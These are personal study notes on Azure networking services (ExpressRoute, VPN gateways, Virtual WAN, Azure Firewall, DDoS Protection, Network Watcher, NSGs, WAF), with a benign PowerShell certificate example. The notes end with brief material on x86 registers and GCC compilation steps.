    Support for Azure Government and National CloudsNoYes
    BGP CommunitiesNoYes
    BGP Sessions2 per peering, per ExpressRoute circuit4 per peering, per ExpressRoute circuit
    CostLowerHigher
    AvailabilityVaries by regionVaries by region

ExpressRoute Gateway SKUs

  • When we create an ExpressRoute Gateway service, we need to specify the SKU that we want to use. We can choose from one of the following three:
    • Standard / ErGw1AZ: This option supports a max of four ExpressRoute connections and up to 1 Gbps bandwidth
    • High Performance / ErGw2AZ: This options supports a max of eight ExpressRoute connections and up to 2 Gbps bandwidth
    • Ultra Performance / ErGw3AZ: This options support a max of 16 ExpressRoute connections and up to 10 Gbps bandwidth
  • The SKUs with ‘AZ’ in the name are zone-redundant, meaning they are highly available across Azure Availability Zones.
  • We can change a SKU after the Gateway has been created
  • An ExpressRoute Gateway must be deployed in a Gateway subnet. (Named ‘GatewaySubnet’). It is recommended to use at least a /26 for the GatewaySubnet.
  • When choosing a Gateway SKU, we want to ensure the bandwidth of the SKU matches the bandwidth of the circuit. ExpressRoute Gateway SKUs

ExpressRoute FastPath

FastPath is designed to improve the data path performance between connected remote networks and Azure vNets. To understand how FastPath works, we need to understand the default behavior without it. By default, the ExpressRoute Gateway performs two main tasks: exchanging network routes with our remote networks AND routing network traffic to Azure vNet resources. Routing the network traffic adds a little processing overhead, which impacts performance metrics such as Packets per Second (PPS) and Connections per Second (CPS). When enabled, FastPath sends network traffic directly to vNet resources, bypassing the gateway. This results in higher bandwidth and better overall performance. FastPath is available for all ExpressRoute circuits, but the ExpressRoute Gateway must be either the ultra-performance or ErGw3AZ SKU.

Encryption over ExpressRoute

  • By default, ExpressRoute connections are not encrypted.
  • Microsoft offers two optional solutions for encrypting data in transit over ExpressRoute connections:
    • MACsec - a Layer 2 encryption protocol that can be used to encrypt physical links. To implement MACsec, we need a Key Vault to store the encryption keys. This key is referred to as the connectivity association key (CAK).
    • IPSec - a Layer 3 encryption protocol that can be used to encrypt data between two endpoints. To implement IPSec, we need to configure a VPN Gateway in Azure and a VPN device on-premises.

BFD

  • BFD (Bidirectional Forwarding Detection) is a network protocol that detects link failures in a network. It is used to detect failures in the forwarding plane of a network.
  • BFD is supported over private peering and Microsoft peering.
  • When you enable BFD, you can speed up failure detection between Microsoft Enterprise Edge (MSEE) devices and your equipment.
  • How it works:
    • On the MSEE devices, BGP keep-alive and hold-time are typically configured as 60 and 180 seconds, respectively. For that reason, when a link failure happens, it can take up to three minutes to detect the failure and switch traffic to an alternate connection.
    • You can control the BGP timers by configuring a lower BGP keep-alive and hold-time on your edge peering device. If the BGP timers are not the same between the two peering devices, the BGP session will establish using the lower time value. The BGP keep-alive can be set as low as 3 seconds. The hold-time can be as low as 10 seconds. However, setting these values too low isn’t recommended because the protocol is process-intensive.

Configure ExpressRoute and site to site coexisting connections

  • You can configure Site-to-Site VPN as a secure failover path for ExpressRoute or use Site-to-Site VPNs to connect to sites that are not connected through ExpressRoute.

  • Configuring Site-to-Site VPN and ExpressRoute coexisting connections has several advantages: -You can configure a Site-to-Site VPN as a secure failover path for ExpressRoute.

    • Alternatively, you can use Site-to-Site VPNs to connect to sites that are not connected through ExpressRoute.
  • You can configure either gateway first. Typically, you will incur no downtime when adding a new gateway or gateway connection.

  • Network Limits and limitations

    • Only route-based VPN gateway is supported. You must use a route-based VPN gateway. You also can use a route-based VPN gateway with a VPN connection configured for ‘policy-based traffic selectors’.
    • The ASN of Azure VPN Gateway must be set to 65515. Azure VPN Gateway supports the BGP routing protocol. For ExpressRoute and Azure VPN to work together, you must keep the Autonomous System Number of your Azure VPN gateway at its default value, 65515. If you previously selected an ASN other than 65515 and you change the setting to 65515, you must reset the VPN gateway for the setting to take effect.
    • The gateway subnet must be /27 or a shorter prefix, (such as /26, /25), or you will receive an error message when you add the ExpressRoute virtual network gateway.
    • Coexistence in a dual stack VNet is not supported. If you are using ExpressRoute IPv6 support and a dual-stack ExpressRoute gateway, coexistence with VPN Gateway will not be possible.

VPN

What is a VPN?

  • A VPN (Virtual Private Network) is a service that allows you to connect to the internet via an encrypted tunnel to ensure your online privacy and protect your sensitive data.

Azure Point to Site VPN

  • Azure Point-to-Site VPN is a secure connection between a virtual network in Azure and a client computer. VPN is used to connect the client to the Azure virtual network.
  • The VPN connection is encrypted and provides secure access to on-premises resources.
  • The VPN client is installed on the client computer and is used to connect to the Azure virtual network.
  • The VPN client is used to connect to the Azure virtual network.
  • The Virtual Network Gateway is used to connect the on-premises network to the Azure virtual network.
  • P2S VPN Connections require that you configure 3 configuration settings in Azure (in addition to a VNG, etc.):
    • Address Pool: The IP address range that will be assigned to the VPN clients.
      • The address range that you choose must not overlap with the vNet’s address range.
      • If multiple protocols are configured for the tunnel type, and SSTP is one of those protocols, the address pool will be split between the configured protocols.
    • Tunnel Type: The tunnel type that will be used for the VPN connection. Options are SSTP, IKEv2, and OpenVPN.
      • OpenVPN is SSL-based and operates on port 443.
        • OpenVPN is supported on all platforms, but a client will usually need to be downloaded and installed.
        • OpenVPN is required if you want clients to authenticate with Azure Active Directory credentials.
      • SSTP is SSL-based and operates on port 443. It is a Microsoft-proprietary protocol.
      • IKEv2 is IPsec-based and operates on UDP ports 4500 and 500 and IP protocol number 50.
        • Android, Linux, iOS, MacOS, and Windows 10 (and above) come pre-installed with clients that support IKEv2.
        • Windows client will try IKEv2 first when negotiating a connection. They fall back to SSTP.
    • Authentication Type: The authentication type that will be used for the VPN connection. Options are Azure Certificate, Azure AD, and Radius.
      • Azure Certificate: The client must have a client certificate installed to connect to the Azure Virtual Network Gateway.
        • The client certificate must be installed in the ‘Local Machine’ certificate store on the client computer.
        • The Virtual Network Gateway must have the public key of the client certificate uploaded to the Azure Virtual Network Gateway. Or the public key of the root certificate that signed the client certificate.
      • Azure AD: The client must have an Azure Active Directory account to connect to the Azure Virtual Network Gateway.
        • Allows users to connect to the VPN using their Azure AD credentials.
        • Native Azure AD authentication is only supported for OpenVPN connections that use the Azure VPN Client for Windows 10 or later and MacOS clients.
        • The main advantage here is we can benefit from additional identity and security capabilities provided by Azure AD, such as MFA.
      • Radius: The client must have a Radius account to connect to the Azure Virtual Network Gateway. Clients authentication against a RADIUS server hosted in Azure or on-premises.
        • The Virtual Network Gateway forwards authentication requests to/from the client and RADIUS server. Connectivity is important!
        • The RADIUS server can be implemented to integrate with Azure Entra ID or any other external identity system. No need to upload root certificates and revoke client certificates in Azure.
  • P2S connections require a route-based VPN Type.

Azure Site to Site VPN

  • Azure Site-to-Site VPN is a secure connection between an on-premises network and an Azure virtual network.
  • The VPN connection is encrypted and provides secure access to on-premises resources.
  • The VPN connection is established between the on-premises network and the Azure virtual network.
  • The Virtual Network Gateway is used to connect the on-premises network to the Azure virtual network.

Virtual Network Gateway

  • A Virtual Network Gateway is used to send encrypted traffic between an Azure virtual network and an on-premises location over the public internet.

  • Virtual Network Gateway supports the following hybrid connection options:

    • Site to Site VPN connection over IPSec (IKE v1 and IKE v2) - This option can be used to connect an on-premises network to an Azure virtual network.
    • Point to Site VPN connection over SSTP (Secure Socket Tunneling Protocol) - This option can be used to connect a client computer to an Azure virtual network.
    • VNet to VNet VPN connection over IPSec (IKE v1 and IKE v2) - This option can be used to connect two Azure virtual networks.
  • When implementing the VPN Gateway to connect two vNets, there are two connection types you can choose from:

    • vNet-to-vNet: If the source and targets vNets are in the same Azure subscription, choose this option.
    • Site-to-Site (IPsec): If the source and target vNets are not in the same Azure subscription, choose this option.

Virtual Network Gateway SKUs

Virtual Network Gateway SKUs

Virtual Network Gateway Pricing

| SKU | Price |
| --- | --- |
| Basic | $0.04/hour |
| VpnGw1 | $0.19/hour |
| VpnGw2 | $0.49/hour |
| VpnGw3 | $1.25/hour |
| VpnGw4 | $2.10/hour |
| VpnGw5 | $3.65/hour |

Virtual Network Gateway Certificate Authentication

  • Azure Virtual Network Gateway supports certificate authentication for Point-to-Site VPN connections.
  • The VPN client must have a client certificate installed to connect to the Azure Virtual Network Gateway.
  • The client certificate must be installed in the ‘Local Machine’ certificate store on the client computer.
# Create a self-signed root certificate
$params = @{
    Type = 'Custom'
    Subject = 'CN=P2SRootCert'
    KeySpec = 'Signature'
    KeyExportPolicy = 'Exportable'
    KeyUsage = 'CertSign'
    KeyUsageProperty = 'Sign'
    KeyLength = 2048
    HashAlgorithm = 'sha256'
    NotAfter = (Get-Date).AddMonths(24)
    CertStoreLocation = 'Cert:\CurrentUser\My'
}
$cert = New-SelfSignedCertificate @params

# Create a self-signed client certificate
$params = @{
       Type = 'Custom'
       Subject = 'CN=P2SChildCert'
       DnsName = 'P2SChildCert'
       KeySpec = 'Signature'
       KeyExportPolicy = 'Exportable'
       KeyLength = 2048
       HashAlgorithm = 'sha256'
       NotAfter = (Get-Date).AddMonths(18)
       CertStoreLocation = 'Cert:\CurrentUser\My'
       Signer = $cert
       TextExtension = @(
        '2.5.29.37={text}1.3.6.1.5.5.7.3.2')
   }
   New-SelfSignedCertificate @params

Azure Active Directory Authentication

  • Azure Virtual Network Gateway supports Azure Active Directory authentication for Point-to-Site VPN connections.
  • The VPN client must have an Azure Active Directory account to connect to the Azure Virtual Network Gateway.
  • You must register an Azure AD application and grant permissions to the application to use the Azure Virtual Network Gateway.
  • You must set the authentication type to ‘Azure Active Directory’ in the Azure Virtual Network Gateway configuration.
    • You must provide the Tenant ID, Audience (client Id of app), and Issuer of the Azure AD application in the Azure Virtual Network Gateway configuration.
  • Download and install the Azure VPN Client from the MS Store
  • Sign in with your Azure AD account to connect to the Azure Virtual Network Gateway.

Radius Authentication

  • Azure Virtual Network Gateway supports Radius authentication for Point-to-Site VPN connections.
  • The VPN client must have a Radius account to connect to the Azure Virtual Network Gateway.
  • You must configure the Radius server settings in the Azure Virtual Network Gateway configuration.
  • You must provide the Radius server IP (primary and secondary) and Radius server secret (primary and secondary)

Local Network Gateway

  • A Local Network Gateway is a representation of the on-premises location. It contains the public IP address of the on-premises location and the address space.

Gateway Subnet

  • The gateway subnet is used to deploy the virtual network gateway. The gateway subnet must be named ‘GatewaySubnet’ to work properly.
  • The size of the gateway subnet must be at least /29 or larger.
  • Nothing must be deployed in the gateway subnet. It is used by the gateway services only.

Route based vs. Policy based VPN

  • Policy-based VPN - This type of VPN uses a policy defined on the VPN to determine where to send traffic. The policy defines an access list of traffic that should be sent through the VPN tunnel.

    • Limitations:
      • There is no support for dynamic routing protocols such as BGP.
      • It can only be used to establish site-to-site VPN connections.
      • It only supports 1 tunnel when implemented with the basic gateway.
      • If you have a legacy on-prem VPN device that does not support route-based VPNs, you will likely need to create a policy-based VPN.
  • Route-based VPN - This type of VPN uses a routing table to determine where to send traffic. The routing table is used to determine the next hop for the traffic.

    • Only route-based gateway SKUs support active/active mode.
    • Point-to-site connections require a route-based VPN gateway.

    Route-based VPN

Troubleshoot VPNs

  • There are several diagnostic logs you can reference when troubleshooting VPN Connections and Virtual Network Gateways
    • Gateway Diagnostic Log: This log contains diagnostic logs for the gateway, including configuration changes and maintenance events.
    • Tunnel Diagnostic Log: This log contains tunnel state change events. This log is useful to view the historical connectivity status of the tunnel.
    • Route Diagnostic Log: This log contains routing logs, including changes to static routes and BGP events
    • IKE Diagnostic Log: This log contains IKE control messages and events on the gateway.
    • P2S Diagnostic Log: This log contains point-to-site control messages and events on the gateway.

Azure Virtual WAN

Overview

  • Azure Virtual WAN (vWAN): A networking service that provides optimized and automated branch connectivity to, and through, Azure.
  • Virtual Hub: A Microsoft-managed virtual network that enables connectivity between your on-premises networks, Azure VNets, and remote users.

Key Features

  1. Centralized Management: Simplifies the management of large-scale network architectures by providing a single pane of glass for managing connectivity.
  2. Scalability: Designed to handle thousands of VNets, branch connections, and users.
  3. High Availability: Built-in redundancy and high availability for critical network connections.
  4. Security: Integrated with Azure Firewall, DDoS protection, and other security services for comprehensive protection.
  5. Connectivity: Supports Site-to-Site VPN, Point-to-Site VPN, ExpressRoute, and Azure Private Link.

Components

  • Virtual WAN: A management service that we can use to deploy, manage, and monitor resources for connecting networks together. This is a global resource and does not live in a particular network.
  • vWAN Hubs: Regional virtual network hubs that provide central connectivity and routing. A virtual hub is a Microsoft-managed virtual network. The hub contains various service endpoints to enable connectivity. From your on-premises network (vpnsite), you can connect to a VPN gateway inside the virtual hub, connect ExpressRoute circuits to a virtual hub, or even connect mobile users to a point-to-site gateway in the virtual hub. The hub is the core of your network in a region. Multiple virtual hubs can be created in the same region. A hub gateway isn’t the same as a virtual network gateway that you use for ExpressRoute and VPN Gateway. For example, when using Virtual WAN, you don’t create a site-to-site connection from your on-premises site directly to your VNet. Instead, you create a site-to-site connection to the hub. The traffic always goes through the hub gateway. This means that your VNets don’t need their own virtual network gateway. Virtual WAN lets your VNets take advantage of scaling easily through the virtual hub and the virtual hub gateway.
  • vWAN HUB Connections: Connections between a hub and a VNet in the same region. A vNet can only be connected to one hub.
  • Hub-to-Hub Connections: Connectivity between hubs in different regions for global reach. Hubs are all connected to each other in a virtual WAN. This implies that a branch, user, or VNet connected to a local hub can communicate with another branch or VNet using the full mesh architecture of the connected hubs. You can also connect VNets within a hub transiting through the virtual hub, as well as VNets across hub, using the hub-to-hub connected framework.
  • Branch-to-Hub Connections: Site-to-site VPN connections from on-premises locations to the hub.
  • User VPN Connections: Point-to-site VPN connections from remote users to the hub.

Use Cases

  1. Branch Connectivity: Simplifies the connection of branch offices to Azure and to each other.
  2. Global Network Architecture: Centralizes and optimizes connectivity between VNets and on-premises networks across multiple regions.
  3. Remote Access: Provides secure access for remote users through point-to-site VPN.

Benefits

  • Simplified Configuration: Reduces the complexity of managing multiple VNets and connections.
  • Optimized Performance: Leverages Microsoft’s global backbone for high performance and low latency.
  • Cost-Effective: Reduces the need for expensive hardware and dedicated network connections.

Types of vWAN

  • Basic
    • Only supports site-to-site VPN connections in a single hub (no hub-to-hub, ExpressRoute, or user VPN connections).
    • There is a cost advantage in that we do not have to pay the base hourly fee and data processing free for the vWAN hubs that we implement.
  • Standard
    • Supports all connectivity types across multiple hubs.
    • There is an hourly base fee for every hub that we create (.25/hour).
  • You can change the SKU after the vWAN has been created. You can upgrade a basic to a standard, but you cannot downgrade a standard to a basic.

Routing Infrastructure Units (RIUs)

  • When a new vWAN is created, virtual hub routers are deployed into it. The virtual hub router is the central component that manages all routing between vNETs and gateways.
  • A Routing Infrastructure Unit (RIU) is a unit of scale that defines both the aggregate throughput of the virtual hub router and the aggregate number of virtual machines that can be deployed in all connected VNets.
  • By default, the virtual hub router will deploy 2 RIUs with no extra cost. The 2 units support 3 Gbps of throughput and 2000 connections across all connected vNETs.
  • You can add additional RIUs in increments of 1 Gbps of throughput and 1000 VM connections.
  • There is an additional cost of .10/RIU above the 2 that are included.
Routing infrastructure unitAggregate throughput (Gbps)Number of VMs
232000
333000
444000
555000
666000
777000
888000
999000
101010000

Site to Site Connectivity with vWAN

  • You can connect remote networks to the vWAN hub using site-to-site VPN connections or ExpressRoute.
  • To deploy a site to site VPN connection, we need to deploy a Site-to-Site VPN Gateway into our vWAN hub by specifying the number of gateway scale units we want. The number that we specify for the Gateway Scale Units defines the aggregate maximum throughput for the VPN connections.
  • S2S VPN Gateway instances in a vWAN hub are always deployed in an active-active configuration for high availability.
  • a VPN Gateway in a vWAN hub is limited to 30 connections while 20 Gateway Scale Units in a vWAN hub can support up to 1000 connections.

Routing Order Precedence

  • If multiple paths exist for a destination subnet, the virtual hub router uses the following logic to determine the route to the destination:
    1. Routes with the longest prefix match are always preferred
    2. Static routes are preferred over routes learned via BGP
    3. The best path is selected based on the route preference configured (ExpressRoute-learned route, VPN-learned route, or the route with the shortest BGP AS-Path Length)

Secure-and-monitor-networks

Directory Map

Application Security Groups

Introduction

  • Application Security Groups (ASGs) are used to group virtual machines and apply network security group rules to the group

Benefits

  • Simplifies network security group management
  • Reduces the number of rules that need to be created
  • Allows for more granular control over network security group rules

Example

  • Create an ASG
  • Add VMs to the ASG
  • Add the ASG as a traffic source in a network security group rule

Azure Firewall

Introduction

  • Azure Firewall is a managed, cloud-based network security service that protects your Azure Virtual Network resources. It’s a fully stateful firewall as a service with built-in high availability and unrestricted cloud scalability. It can be used to scan inbound and outbound traffic.
  • Azure Firewall requires it’s own subnet. The name needs to be AzureFirewallSubnet.
  • Force Tunneling requires that a subnet named AzureFirewallManagementSubnet be created. This subnet is used for Azure Firewall management traffic.

Azure Firewall Features

  • Built-in high availability
  • Unrestricted cloud scalability
  • Application FQDN Filtering rules
  • FQDN Tags - tags make it easy for you to allow well-known Azure Service network traffic through your firewall.
  • Service Tags - A service tag represents a group of IP address prefixes to help minimize security rule complexity. Microsoft manages these. You cannot create your own service tags or modify existing service tags.
  • Threat Intelligence - IDS/IPS
  • TLS Inspection - decrypt outbound traffic, process the data, and then re-encrypt it before sending it to it’s destination
  • Outbound SNAT support
  • Inbound DNAT support
  • Forced Tunneling

Rule Processing

Classic Rules

  • You can create NAT rules, network rules, and application rules, and this can all be done using classic rules or Firewall Policy
  • Azure Firewall denies all traffic by default. You must create rules to allow traffic.
  • With classic rules, rule collections are processed according to the rule type in priority order. Lower to higher numbers from 100 (highest priority) to 65000 (lowest priority).

Firewall Policy

  • Configuring a single Azure Firewall can be complex due to multiple rule collections, including:
    • Network Address Translation (NAT) rules
    • Network rules
    • Application rules
  • Additional complexities include custom DNS settings, threat intelligence rules, and the need for different rules for different groups (e.g., developers, database users, marketing).
  • Firewall Policy:
    • An Azure resource that contains collections of NAT, network, and application rules.
    • Also includes custom DNS settings, threat intelligence settings, and more.
    • Can be applied to multiple firewalls via Azure Firewall Manager.
    • Supports hierarchical policies, where a base policy can be inherited by specialized policies.
  • With Firewall Policy, rules are organized in rule collections which are contained in rule collection groups. Rule collections can be of the following types:
    • DNAT
    • Network
    • Application
  • You can define multiple rule collection types in a rule collection group. But all of the rules in a rule collection must be of the same type.
  • Rule collections are processed in the following order:
    • DNAT
    • Network
    • Application

Availability Zones

  • Azure Firewall supports Availability Zones. When you create an Azure Firewall, you can choose to deploy it in a single zone or across all zones.
  • SLAs:
    • Single Zone: 99.95%
    • Multiple Zones: 99.99%

Azure Firewall Service Tiers

  • Azure Firewall is available in three service tiers: Basic, Standard, and Premium.
    • Basic: Designed for small and medium-sized businesses.
      • Provides basic network traffic protection at an affordable cost.
    • Standard: Designed for organizations that require basic network security with high scalability at a moderate price.
    • Premium: Designed for organizations in highly regulated industries that handle sensitive information and require a higher level of network security.
      • Able to encrypt/decrypt network traffic for TLS inspection
      • IDS/IPS capabilities
      • Supports path based URL filtering
        • Standard supports URL filtering, but you cannot filter based on the path of the URL.
      • Web Categories
        • Allow or deny traffic to and from websites based on categories (gambling, social media, pornography, etc.)

Azure Firewall Capabilities

  • Network Filtering
    • Can filter traffic based on the five tuples of the source IP address, destination IP address, source port, destination port, and protocol.
      • You can filter based on user-defined groups of IP addresses of Azure Service Tags.
  • FQDN Filtering
    • A simple URL filter without TLS termination or packet inspection.
    • FQDN Filtering can be enabled at the network level or the application level. If configured at the application layer, it uses information in the HTTP headers to allow or block outgoing web traffic or Azure SQL traffic.
    • Can be bypassed by initiating requests using IP addresses.
    • To simplify applying rules to multiple FQDNs, you can use FQDN Tags. For example, if you wanted to filter Windows Update FQDNs, rather than manually maintaining a list of all the Windows Update FQDNs, you could simply use the Windows Update FQDN Tag.
  • URL Filtering
    • Expands on FQDN filtering to evaluate the entire URL path, rather than just domain names.
    • This feature is only available with the Premium SKU.
  • Web Categorization Filtering
    • Can be used to allow or block outgoing web traffic based on the category of the website. For example, you could block all social media websites.
    • Both Standard and Premium SKUs support this feature, with the Premium SKU supporting more accurate categorization.
  • Threat Intelligence-based Filtering
    • Azure Firewall can use threat intelligence feeds to block known malicious IP addresses and domains.
    • Enabled in Alert Mode by default. But can be configured in Alert and Deny mode or even Disabled.
    • Supported by both Premium and Standard SKUs.

Azure Firewall Manager

  • Azure Firewall Manager provides a central point for configuration and management of multiple Azure Firewall instances.
  • Enables the creation of one or more firewall policies that can be rapidly applied to multiple firewalls.

Key Features of Azure Firewall Manager

FeatureDescription
Centralized managementManage all firewall configurations across your network.
Manage multiple firewallsDeploy, configure, and monitor multiple firewalls from a single interface.
Supports multiple network architecturesProtects standard Azure virtual networks and Azure Virtual WAN Hubs.
Automated traffic routingNetwork traffic is automatically routed to the firewall (when used with Azure Virtual WAN Hub).
Hierarchical policiesCreate parent and child firewall policies; child policies inherit rules/settings from parent.
Support for third-party security providersIntegrate third-party SECaaS solutions to protect your network’s internet connection.
DDoS protection planAssociate virtual networks with a DDoS protection plan within Azure Firewall Manager.
Manage Web Application Firewall policiesCentrally create and associate Web Application Firewall (WAF) policies for platforms like Azure Front Door and Azure Application Gateway.

Note: Azure Firewall Manager allows integration with third-party SECaaS solutions, enabling Azure Firewall to monitor local traffic while the third-party provider monitors internet traffic.

Architecture Options

  • Hub virtual network: A standard Azure virtual network where one or more firewall policies are applied.
  • Secured virtual hub: An Azure Virtual WAN Hub where one or more firewall policies are applied.

DDoS Protection

Overview

A distributed denial of service attack occurs when an attacker overwhelms a target with a flood of traffic, rendering the target unable to respond to legitimate requests. DDoS attacks can be difficult to mitigate because the attacker can use many different IP addresses to send traffic to the target. This makes it difficult to block the attacker’s traffic without also blocking legitimate traffic.

Types of DDoS Attacks

  • Volumetric Attacks: These attacks flood the target with a large amount of traffic, overwhelming the target’s network capacity.
  • Protocol Attacks: These attacks exploit vulnerabilities in network protocols to consume the target’s resources.
  • Application Layer Attacks: These attacks target the application layer of the target, consuming resources such as CPU and memory.

Azure DDoS Protection provides protection against volumetric and protocol attacks. To protect against application layer attacks, you can use a Web Application Firewall (WAF).

Azure DDoS Protection

  • Service Tiers
    • IP Protection: This tier offers a pricing model in which you pay per protected public IP address.
    • Network Protection: This tiers offers protection for an entire virtual network and all public IP addresses that are associated with resources in the vNet.
      • DDoS Network Protection provides additional features that are not available with the IP Protection:
        • DDoS Rapid Response Support - Gives you access to a team of DDoS response specialists who can help you mitigate an attack.
        • Cost Protection - Provides Azure credits back to us if a successful DDoS attack results in extra costs due to infrastructure scale out.
        • WAF Discount - Offers a pricing discount for Azure WAF

Network Watcher

Introduction

Network Watcher is a collection of tools used to monitor and diagnose network connectivity in Azure. It focuses on monitoring the network health of IaaS services in Azure. Network Watcher is not suitable for monitoring PaaS services or performing web analytics. The tools in Network Watcher fall into two main categories - network monitoring and network diagnostics.

Network Monitor is a regional service which means we must create a Network Watcher in each region we want to monitor. Network Watcher is not enabled by default and must be enabled in each region we want to monitor.

Tools

Network Monitoring Tools

Topology

  • The Topology tool provides a visual representation of the network resources in a subscription. The tool shows the resources in a subscription and the connections between them. The Topology tool can be used to understand the network architecture of a subscription, identify network security groups, and troubleshoot network connectivity issues.
  • The only requirements is to have a Network Watcher resource enabled in the same region as the vNet for which you want to create a topology map.
  • There is no additional cost for using the Topology Map.

Connection Monitor

  • Continuously monitor the connection between two endpoints.
  • Connection Monitor relies on agents that are installed on source endpoints to perform connectivity tests and collect data related to connection health. The agent simulates network traffic between source and destination to measure key metrics, such as latency.
  • The agent to install on the source endpoint depends on whether the source VM is running in Azure or on-premises. For Azure VMs, we can install the Network Watcher extension. For on-prem VMs, we can install the Azure Monitor Agent (AMA).
  • Stores results in Log Analytics
  • Connectivity checks can use HTTP, TCP, or ICMP

Network Diagnostics Tools

IP Flow Verify

  • Network Watcher IP flow verify checks if a packet is allowed or denied from a virtual machine based on 5-tuple information. The security group decision and the name of the rule that denied the packet will be returned

Next Hop

  • Next Hop provides the next hop from the target virtual machine to the destination IP address.

Connection Troubleshoot

  • Available from the Network Watcher blade or from the Virtual Machine blade
  • Similar to Connection Monitor, but allows you to monitor the connection between a VM and a destination IP address on-demand, rather than continuously
  • Can be used to check if a port is open at a destination
  • Only supports ICMP and TCP
  • If the endpoint to test is an Azure VM or VMSS instance, you need to install the Network Watcher extension.

Componenents

  • Source Types:
    • VM / VMSS
    • App Gateway
    • Bastion Host
  • Destionation Types:
    • Virtual Machine
    • IP Address
  • You can choose to use IPv4 or IPv6, or both
  • You then specify the source and destination ports
  • You can also specify the protocol to use (TCP or ICMP
  • Finally, you choose the type of Diagnostic Test to run:
    • Connectivity Test
    • Next Hop
    • NSG Diagnostic
    • Port Scanner

NSG Diagnostics

  • The Network Security Group Diagnostics tool provides detailed information to understand and debug the security configuration of your network. For a given source-destination pair, network security group diagnostics returns all network security groups that will be traversed, the rules that will be applied in each network security group, and the final allow/deny status for the flow.
  • The tool can be used to troubleshoot connectivity issues, understand the rules that are applied to a flow, and verify that the rules are correct.

NSG Flow Logs

  • NSG Flow Logs are a feature of Network Watcher that allows you to view information about ingress and egress IP traffic through a Network Security Group. The logs are stored in a storage account and can be viewed in the Azure portal or downloaded for further analysis.

Packet Capture

  • Packet capture allows you to create packet capture sessions to track traffic to and from a virtual machine. You can create a packet capture session on a VM, VMSS, or network interface. The packet capture session will capture all network traffic to and from the virtual machine or network interface. You can then download the packet capture file and analyze it using a network protocol analyzer.

Network Security Groups

Introduction

  • Network Security Groups are access control lists that are attached to a virtual machine’s vNic or a subnet
  • By default, there are no inbound allow rules added to a NSG
  • NSG rules are stateful, meaning that if you allow traffic in one direction, the return traffic is automatically allowed
  • When you have rules applied to both subnet and vNic, the rules are combined. Any allow rules at the subnet level must also be allowed at the vNic level

Default Rules

  • There are 3 default inbound rules that are added to a NSG:

    • AllowVnetInBound - allow traffic within the vNet
    • AllowAzureLoadBalancerInBound - allow traffic from Azure Load Balancer
    • DenyAllInBound - deny all inbound traffic
  • There are 3 default outbound rules that are added to a NSG:

    • AllowVnetOutBound - allow traffic within the vNet
    • AllowInternetOutBound - allow traffic to the internet
    • DenyAllOutBound - deny all outbound traffic

Rule Priority

  • Rules are evaluated in priority order
  • The lower the number, the higher the priority
  • The default rules have a priority of 65,000

Rule Types

  • There are 2 types of rules:
    • Default Rules - cannot be deleted
    • Custom Rules - can be added, modified, or deleted

Rule Properties

  • Name - name of the rule
  • Priority - determines the order in which rules are applied
  • Source/Destination - can be an IP address, CIDR block, service tag, or application security group
  • Protocol - TCP, UDP, or Any
  • Port Range - single port, range of ports, or * for all ports
  • Action - Allow or Deny
  • Direction - Inbound or Outbound

Source Types

  • IP Address - single IP address
  • CIDR Block - range of IP addresses
  • Service Tag - predefined tag for Azure services
  • Application Security Group - group of VMs that can be used as a source or destination

Service Tags

  • Internet - all IP addresses
  • VirtualNetwork - all IP addresses in the vNet
  • AzureLoadBalancer - all IP addresses of Azure Load Balancer
  • AzureTrafficManager - all IP addresses of Azure Traffic Manager
  • GatewayManager - all IP addresses of VPN Gateway
  • AzureMonitor - all IP addresses of Azure Monitor
  • Storage - all IP addresses of Azure Storage
  • SQL - all IP addresses of Azure SQL
  • AppService - all IP addresses of Azure App Service
  • ContainerRegistry - all IP addresses of Azure Container Registry
  • KeyVault - all IP addresses of Azure Key Vault
  • AzureBackup - all IP addresses of Azure Backup
  • AzureDNS - all IP addresses of Azure DNS
  • LogAnalytics - all IP addresses of Azure Log Analytics
  • EventHub - all IP addresses of Azure Event Hub
  • ServiceBus - all IP addresses of Azure Service Bus
  • AzureCosmosDB - all IP addresses of Azure Cosmos DB
  • AzureContainerInstance - all IP addresses of Azure Container Instance
  • etc….

Web Application Firewall

Introduction

  • Azure has a web application firewall integrated with two services: Azure Front Door and Azure Application Gateway.
  • A WAF is a security feature that protects web applications from common web vulnerabilities.

Rule Sets

  • OWASP Core Rule Set (CRS):
    • Can only be applied to Application Gateway WAF and not Front Door WAF
  • Microsoft Rule Set:
    • Can be applied to both Application Gateway WAF and Front Door WAF
    • Contains rules authored by the Microsoft Threat Intelligence Team, in addition to the OWASP CRS rules
    • Can only be applied to the Azure Front Door Premium SKU
  • Microsoft Bot Manager Rule Set:
    • Can be applied to both Application Gateway WAF and Front Door Premium (not Standard) WAF
    • Contains rules to protect against bot traffic, authored by the Microsoft Threat Intelligence Team

Assembly

Table of Contents

Syntaxes

  • There are 2 types of assembly language syntax in common use:

Intel

ATT

Registers

  • Registers are small, fast storage areas on the CPU
  • In IA-32 architecture, there are 10 32-bit registers and 6 16-bit registers
  • Registers are grouped into 3 categories: general-purpose, control, and segment
    • general-purpose is further grouped into data, index, and pointer

General-Purpose Registers

Data Registers

  %eax: Accumulator, often used for arithmetic and return values.
  %ebx: Base register, used for extra storage.
  %ecx: Counter, often used in loops.
  %edx: Data register, often used for I/O operations.

Index registers

  %esi/%edi: Source and destination for data operations.

Pointer Registers

    %eip: stores the offset address of the next instruction to be executed. 
    %esp: Stack Pointer, points to the top of the stack.
    %ebp: Base Pointer, used for stack frame management.

Control Registers

Segment Registers

The 4 Steps of Compilation with GCC

GCC transforms source code into an executable file through four primary steps:


1. Preprocessing

  • What happens:
    • The preprocessor handles directives in the source code (e.g., #include, #define, #ifdef).
    • It replaces macros, includes header files, and resolves conditional compilation directives.
  • Input: .c source file.
  • Output: A preprocessed source file (usually with a .i or .ii extension).
  • Command:
    gcc -E file.c -o file.i
    
  • Example:
    • Converts:
      #include <stdio.h>
      #define PI 3.14
      printf("PI is %f\n", PI);
      
      Into:
      // Expanded header contents of stdio.h
      printf("PI is %f\n", 3.14);
      

2. Compilation

  • What happens:
    • The compiler translates the preprocessed source code into assembly language, specific to the target architecture.
  • Input: Preprocessed source file (.i or .ii).
  • Output: Assembly file (usually with a .s extension).
  • Command:
    gcc -S file.i -o file.s
    
  • Example:
    • Converts preprocessed code into assembly instructions like:
      movl $3.14, -4(%ebp)
      call printf
      

3. Assembly

  • What happens:
    • The assembler translates the assembly code into machine code, creating an object file.
  • Input: Assembly file (.s).
  • Output: Object file (.o or .obj).
  • Command:
    gcc -c file.s -o file.o
    
  • Example:
    • Produces a binary object file containing machine instructions that the CPU can execute.

4. Linking

  • What happens:
    • The linker combines object files and libraries to create an executable program.
